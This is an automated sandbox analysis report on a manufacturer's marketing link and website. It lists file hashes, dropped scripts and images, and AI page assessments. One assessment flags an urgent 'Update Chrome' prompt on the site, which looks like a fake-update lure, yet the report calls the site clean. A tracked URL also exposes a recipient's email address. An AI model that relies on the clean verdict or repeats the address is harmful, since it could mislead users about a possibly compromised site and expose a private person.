                                                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                            Sample URL:https://mktg.rocklandmfg.com/acton/ct/45001/s-00f3-2307/Bct/l-0047/l-0047:bbe6/ct8_0/1/pp?sid=TV2%3AH0Ovdhpra
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:13
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • EGA enabled
                                                                            Analysis Mode:stream
                                                                            Analysis stop reason:Timeout
                                                                            Detection:CLEAN
                                                                            Classification:clean2.win@22/152@106/587
                                                                            • Exclude process from analysis (whitelisted): svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.186.78, 173.194.76.84, 34.104.35.123, 142.250.185.106, 142.250.186.74
                                                                            • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, ajax.googleapis.com, clientservices.googleapis.com, clients.l.google.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • VT rate limit hit for: https://mktg.rocklandmfg.com/acton/ct/45001/s-00f3-2307/Bct/l-0047/l-0047:bbe6/ct8_0/1/pp?sid=TV2%3AH0Ovdhpra
                                                                            InputOutput
                                                                            URL: https://mktg.rocklandmfg.com Model: Joe Sandbox AI
                                                                            {
                                                                                "typosquatting": false,
                                                                                "unusual_query_string": false,
                                                                                "suspicious_tld": false,
                                                                                "ip_in_url": false,
                                                                                "long_subdomain": false,
                                                                                "malicious_keywords": false,
                                                                                "encoded_characters": false,
                                                                                "redirection": false,
                                                                                "contains_email_address": false,
                                                                                "known_domain": false,
                                                                                "brand_spoofing_attempt": false,
                                                                                "third_party_hosting": false
                                                                            }
                                                                            URL: https://mktg.rocklandmfg.com
                                                                            URL: https://mktg.rocklandmfg.com/acton/fs/blocks/showLandingPage/a/45001/p/p-0008/t/page/fm/0?email=Abradford@carolinacat.com&quote=376429&recid=l-0047:bbe6&items=HD%20Heavy-Duty%20Excavator%20Bucket&nbsp;&nbsp;&nbsp;Caterpillar&nbsp;315C&nbsp;&nbsp;&nbsp;Qty Model: Joe Sandbox AI
                                                                            ```json
                                                                            {
                                                                              "contains_trigger_text": false,
                                                                              "trigger_text": "unknown",
                                                                              "prominent_button_name": "unknown",
                                                                              "text_input_field_labels": "unknown",
                                                                              "pdf_icon_visible": false,
                                                                              "has_visible_captcha": false,
                                                                              "has_urgent_text": false,
                                                                              "has_visible_qrcode": false
                                                                            }
                                                                            URL: https://mktg.rocklandmfg.com/acton/fs/blocks/showLandingPage/a/45001/p/p-0008/t/page/fm/0?email=Abradford@carolinacat.com&quote=376429&recid=l-0047:bbe6&items=HD%20Heavy-Duty%20Excavator%20Bucket&nbsp;&nbsp;&nbsp;Caterpillar&nbsp;315C&nbsp;&nbsp;&nbsp;Qty Model: Joe Sandbox AI
                                                                            ```json
                                                                            {
                                                                              "brands": [
                                                                                "Rockland"
                                                                              ]
                                                                            }
                                                                            URL: https://rocklandmfg.com/ Model: Joe Sandbox AI
                                                                            ```json
                                                                            {
                                                                              "contains_trigger_text": false,
                                                                              "trigger_text": "unknown",
                                                                              "prominent_button_name": "REQUEST A QUOTE",
                                                                              "text_input_field_labels": "unknown",
                                                                              "pdf_icon_visible": false,
                                                                              "has_visible_captcha": false,
                                                                              "has_urgent_text": false,
                                                                              "has_visible_qrcode": false
                                                                            }
                                                                            URL: https://rocklandmfg.com Model: Joe Sandbox AI
                                                                            {
                                                                                "typosquatting": false,
                                                                                "unusual_query_string": false,
                                                                                "suspicious_tld": false,
                                                                                "ip_in_url": false,
                                                                                "long_subdomain": false,
                                                                                "malicious_keywords": false,
                                                                                "encoded_characters": false,
                                                                                "redirection": false,
                                                                                "contains_email_address": false,
                                                                                "known_domain": false,
                                                                                "brand_spoofing_attempt": false,
                                                                                "third_party_hosting": false
                                                                            }
                                                                            URL: https://rocklandmfg.com
                                                                            URL: https://rocklandmfg.com/ Model: Joe Sandbox AI
                                                                            ```json
                                                                            {
                                                                              "brands": [
                                                                                "Ritchie Bros."
                                                                              ]
                                                                            }
                                                                            URL: https://rocklandmfg.com/ Model: Joe Sandbox AI
                                                                            ```json
                                                                            {
                                                                              "contains_trigger_text": true,
                                                                              "trigger_text": "Update now to keep your Chrome browser running smoothly and securely.",
                                                                              "prominent_button_name": "Update Chrome",
                                                                              "text_input_field_labels": "unknown",
                                                                              "pdf_icon_visible": false,
                                                                              "has_visible_captcha": false,
                                                                              "has_urgent_text": true,
                                                                              "has_visible_qrcode": false
                                                                            }
                                                                            URL: https://rocklandmfg.com/ Model: Joe Sandbox AI
                                                                            ```json
                                                                            {
                                                                              "brands": [
                                                                                "Chrome"
                                                                              ]
                                                                            }
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 19:05:01 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2673
                                                                            Entropy (8bit):3.9778133158119675
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:C4C9A1DC44222E7EB4B2A2F539AA995A
                                                                            SHA1:32874C5B75CC32F9ACC9C0FE61D9572E114D1D84
                                                                            SHA-256:FA1B0DCEEF264CFD7EB5041D2386DCAE440768E9D5C1CAD102822BAC0E1F5F26
                                                                            SHA-512:0FDFE8A28B6C4A2EC48DF4A9D49120E5397F732AE9E2C052A8B0B4ABB0F9F9618C6EF21C58DFADE354865D77FDB02218F1414D7BA51D6D4B42526EB27E8890FA
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:L..................F.@.. ...$+.,....irLQ.:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............R.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 19:05:01 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2675
                                                                            Entropy (8bit):3.9980273511735196
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:734A7512FDA99F1023FBCC07D13611F8
                                                                            SHA1:0FF1A347258640E2D65B9F9F7AE148CDCA2C5210
                                                                            SHA-256:3C04D0291EFDE4234972ED45BD7FA6AB1675A662995D888150EA4C14A8BCC8C7
                                                                            SHA-512:349C72C1CC4D0E07B0F99B77AAABE77F9DAB610ABA51050F9B6ECFE6792D642E0F265CC7862316F0217287BC02CAB482A6A780431EAB9644B6133827E9566DCC
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:L..................F.@.. ...$+.,.....=@Q.:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............R.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2689
                                                                            Entropy (8bit):4.006337987177669
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:89DE03FD6BD6D93C8CFB5C5519D09D51
                                                                            SHA1:E763E03780302280F50419754B3A1597B38C8CC4
                                                                            SHA-256:D1EB92F413C12D4C6A8586D6499F7BDF4F2D320838B8DD9FB334DA1C4FBDC4B8
                                                                            SHA-512:CC02395339A56BC2B29B40A4A4B9DD3DD9F60B26A2FF98BAD7A58A463423490AD567A6AC9773CFBB073B4BE8557DC81216E21B1B6C042B37AEFEB611FB190EC2
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............R.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 19:05:01 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2677
                                                                            Entropy (8bit):3.99402319356313
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:83BE5D972216A5E14D96825C2E52EFE0
                                                                            SHA1:754342DE43453D043970BEC85486DF38C5480220
                                                                            SHA-256:2CC420D6AC8703F4C449F9E3FEA5C3E1AA265FD8D61A8258A17A48280511222D
                                                                            SHA-512:33EAE0C628EDDF442C8D3AD4E0827B71A850B38158BC5758267EBBD62EFDB4CD87C24DAB16460ED361C1EFB8F8D9189E19185AC4D318117AB076DF8C449D87E0
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:L..................F.@.. ...$+.,....C.:Q.:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............R.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 19:05:01 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2677
                                                                            Entropy (8bit):3.9828708634149406
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:C933924B1DE16BD135AE78F09F0A1653
                                                                            SHA1:3A3829CD8B972D6AE5A41E40501385D6A490E56C
                                                                            SHA-256:12ABA6335E4F7B6BCE8F60CA0BDCF84EE24E4D7BC83CF129D7BE7A47CF4D79B9
                                                                            SHA-512:24AA917C5115C6C65660336F657CAA5B7928439F552C04837C09520D84451E1FA133205A346BB2CE5E981D0360692845402E8526B25AE5C016DA43E50E17D02C
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:L..................F.@.. ...$+.,.....0FQ.:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............R.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 19:05:01 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2679
                                                                            Entropy (8bit):3.9937018268960736
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:D93357A719E1618FF998074054A8AB63
                                                                            SHA1:D938F4C1D543C0FC8EEA82A126FEA5BC0C54B4CE
                                                                            SHA-256:C03F07D643EF79D2970891A10A723608F9CC7AD06CA1F4D9F613037E8AA6625D
                                                                            SHA-512:3F7C6F4B5AF675CF41C51CBC8B3D26D7EAAC04E45B6B06041F63470FBD7BA6AA59C0BE5AD08AACA4A6C3D1593DA72F74278D3CBFD8AEEBF7995D0CD5EA400E04
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:L..................F.@.. ...$+.,......1Q.:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............R.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (16769)
                                                                            Category:dropped
                                                                            Size (bytes):408409
                                                                            Entropy (8bit):5.649079073414451
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:B509B565D936325A58B19EF600E55B71
                                                                            SHA1:9A56152AA24FC53F3D08106F828E11CA92B79F4A
                                                                            SHA-256:177DEC386C92E7F6F5B8A5D1B065977993361A7BA7C919ACBCEF26FCF401BEBB
                                                                            SHA-512:9F2C2460C8F4B385DC90A458CB65C8B182BD224A3F6F0F718985832536F6F7BC6F5987F99DDC6EB85F4C2D66864C7F51DB038EAF772C511DE299F89A0A504216
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":15,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):68855
                                                                            Entropy (8bit):5.342564988585251
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:7270C88429FB55FDFED258CD32BEB804
                                                                            SHA1:732D27A9A7B89CEA06A51B8C048BCB21C12262E5
                                                                            SHA-256:3CE9BE76F458848A316E79E59B1F08598F7BB71778871A34BD9C469772459728
                                                                            SHA-512:2BF6D1726E08B3D79E6F396DD19FD0894157DBB1D2662C79872784BFAF0B493FAA4B7A6E9CD4D9B449E26A807B1235B35835B8AED27D4C8D376E454A8718C1E3
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:!function(t,e,n,o){"use strict";if(t.console=t.console||{info:function(t){}},n)if(n.fn.fancybox)console.info("fancyBox already initialized");else{var i,s,a={closeExisting:!1,loop:!1,gutter:50,keyboard:!0,preventCaptionOverlap:!0,arrows:!0,infobar:!0,smallBtn:"auto",toolbar:"auto",buttons:["zoom","slideShow","thumbs","close"],idleTime:3,protect:!1,modal:!1,image:{preload:!1},ajax:{settings:{data:{fancybox:!0}}},iframe:{tpl:'<iframe id="fancybox-frame{rnd}" name="fancybox-frame{rnd}" class="fancybox-iframe" allowfullscreen="allowfullscreen" allow="autoplay; fullscreen" src=""></iframe>',preload:!0,css:{},attr:{scrolling:"auto"}},video:{tpl:'<video class="fancybox-video" playsinline controls controlsList="nodownload" poster="{{poster}}"><source src="{{src}}" type="{{format}}" />Sorry, your browser doesn\'t support embedded videos, <a href="{{src}}">download</a> and watch with your favorite video player!</video>',format:"",autoStart:!0},defaultType:"image",animationEffect:"zoom",animationD
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 170 x 65, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):3680
                                                                            Entropy (8bit):7.919215635134126
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:961E9BC71517747A18BC927E29031B33
                                                                            SHA1:7A9F54F10107A1DB013DA5EAC6C22E3CEB43740A
                                                                            SHA-256:244F279E04180EFA96DC2E83909B181A5B8A3D68F9D1D461BF1CAD8444215E20
                                                                            SHA-512:4AACD1F6CDF1708D7B0CB16AFB23D03ADDD5C769D65AF3E1D3A6DA7C25F953FE7341CCD4425548057209274283F092FB07DA6DC714A6D2BB2D18AEA26D8CF8AD
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR.......A.....A.?....'IDATx......P...;...).RMZ.jc.(.Z..o.....Q_.(I.Q4......:.E6.. >..Io..t.qf......!..............................i...$)EK^.,.IUU..uYr..8.i.7t.:.N#.f.Fd8..m...,......^......i.MI...........h..J)..<...l6S...9B......M..]./n0....(.y^.P.i^O&.^.4^...1z..X,"...H^...z....X.\....EA..@ 2.#r.'f.Y.X,~k..q.q.....<.0...$..,':.N...IQ...?...juM.X...??....TU....;.cY.'}2..3....m..H....z(...>.>.t.PH..{e.6........*..W...#X..1.s{..]..N.j...>...#..fk..[B.J...P.....b.,..-..cl....V...3kj.................*...H....G}..D..lQ{..U\..o....z.&.L.t..>...s...o;.9.....(G....X.B....C_.4hP..a_}.....a.l....;.....".7.n..~.f[.~}..q.G.;w. Q.....*T.P...].."....1c.(....T2g......k.V....y.........qx.A0V.`..M..d.r..P...@..h...[.8q".....]7i.$.^0[JP.y...0TI...0..z..Y..!........C.....GH...%....]*c......Z.n]`...f...Y .=z....!R.9{..g.q...p.B.0m..... l......\..b...r|>.)x.I.............B?A=y.d.6.w..'ON.T...,X@.5...6j............T..e.W.J.......@e.....q...l..rY.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 64x64, components 3
                                                                            Category:downloaded
                                                                            Size (bytes):1912
                                                                            Entropy (8bit):7.717343681083898
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:01F90C4666F38D8849B44160E164789F
                                                                            SHA1:7A8195781C43A04E57AE2ABD7FBDD49ED88BF21A
                                                                            SHA-256:7ECF796CE5034436FC9FC21AA1394D3D4D0CE2A31A21736A4AF907FC55BEF4ED
                                                                            SHA-512:640849637580BCA70B4CE479B618F099A646FA9C173586E738E968948D270A895120E9D6C6B5B5E0C452C2EA2CEA63A9E63673340094C263196F07738C176D82
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ7hPFt8ZNMYNKJFTwFHI1qCEEsaLkpwZuUvruubMA&s=10
                                                                            Preview:......JFIF......................................... ."" ...$(4,$&1'..-=-157:::#+?D?8C49:7...........7%.%77777777777777777777777777777777777777777777777777......@.@...........................................6.........................!1.."AQaq.....BCRb.#$23...................................0......................!.1.."Q..A..aq....2R................?..V.f.#.n..2...S..!....S^...j:~.uU7...q*._...r...L.X...Vv..i..[.....D.....*..'.z...VH:JzH..x.j....H.B.q.!y..k8....[4.[..>5.m.. jq.f.u...)..]....vZ........:....5..u..*.]r.$_Q.oz...5...O...K...t.V.W...Re..pe...UI..4.J.).(..J..q.B...;mQ.Z5.$.e-..S.'i.;.8..G|..%5.ee.YB.kK..9.{I..e...W.c^)..L{.m...h.i.&.u....0.......V....em...u?.......s.{...#.>F...0.+x.d.......q..-........([.~Z.......,.L3..M%cD.a..\..*..+.>.luB1...\........,...+.-..x..M.......lJ+..v..+.n.sRs.c.G.y.:.G...%...F.]2mI...a..ra...#..e./.~h3....?T.;Lf@...Gwe..6W]n.Wm.q.k..<....od...c]{.....Q..i..nf.I.T.w)=.e*O.5.ZX\..'..........F...d.Hm.ic.r.@.......="...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (9969), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):9969
                                                                            Entropy (8bit):4.871564933984721
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:855240DB2FE2EFCD57E45C1548027470
                                                                            SHA1:70153CB4287A67AC84DADCCD77FCB0C61467DDA8
                                                                            SHA-256:AF19406BB3FEB2A1F776D2736D199AE6343A3600920E1BA90A369B726603AD5A
                                                                            SHA-512:B87C0070C3C5B24E784779B0E8702CF1757DF09172C60D659368F0835BAFB2FB73C151BD25CAAA11916152510CBA77C486F4D7E675F8D378268A98231C5F9497
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/header/header-secondary-nav.css?ver=17.0.3
                                                                            Preview:#header-secondary-outer .sf-menu li li ul{margin-left:-20px;margin-top:-20px}#header-outer #header-secondary-outer .nectar-menu-icon-img{margin-bottom:0;width:16px;height:auto;vertical-align:middle}#header-secondary-outer .nectar-menu-icon,#header-secondary-outer .nectar-menu-icon-img{margin-right:7px;top:0;line-height:inherit;display:inline-block}body[data-hhun="1"] #header-secondary-outer[data-remove-fixed="0"]{transition:transform .3s ease}#header-secondary-outer #social li a{display:block;line-height:22px;height:24px;position:relative;transition:all .2s linear;-webkit-transition:all .2s linear;background-position:center top}#header-secondary-outer #social li a i{color:#777;transition:all .2s linear;-webkit-transition:all .2s linear}#header-secondary-outer #social li .behance,#header-secondary-outer #social li .vimeo{background-color:#666}#header-secondary-outer #social li .behance:hover,#header-secondary-outer #social li .vimeo:hover{background-color:#000}body #header-secondary-out
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (3029)
                                                                            Category:downloaded
                                                                            Size (bytes):3313
                                                                            Entropy (8bit):5.165258072964256
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:0C72B3A8834A211A4BE5D7489821A3A0
                                                                            SHA1:793B32F0328082101ED337CCE0C6790119366635
                                                                            SHA-256:2D6B989AE5DDC43C73034AAFFBC3181069557AB604799F4A6AB3BB113CEAA687
                                                                            SHA-512:FA21D6D5B96BD482DA4247B077A4454C23E8DD4DB3D3ECAE859493BE2DCD9CE94DDFDAA3F2259C7936B1BCFFF609C6C0866E02FDAFB25EFAC9DED25C4100AE9A
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/woocommerce/assets/js/accounting/accounting.min.js?ver=0.4.2
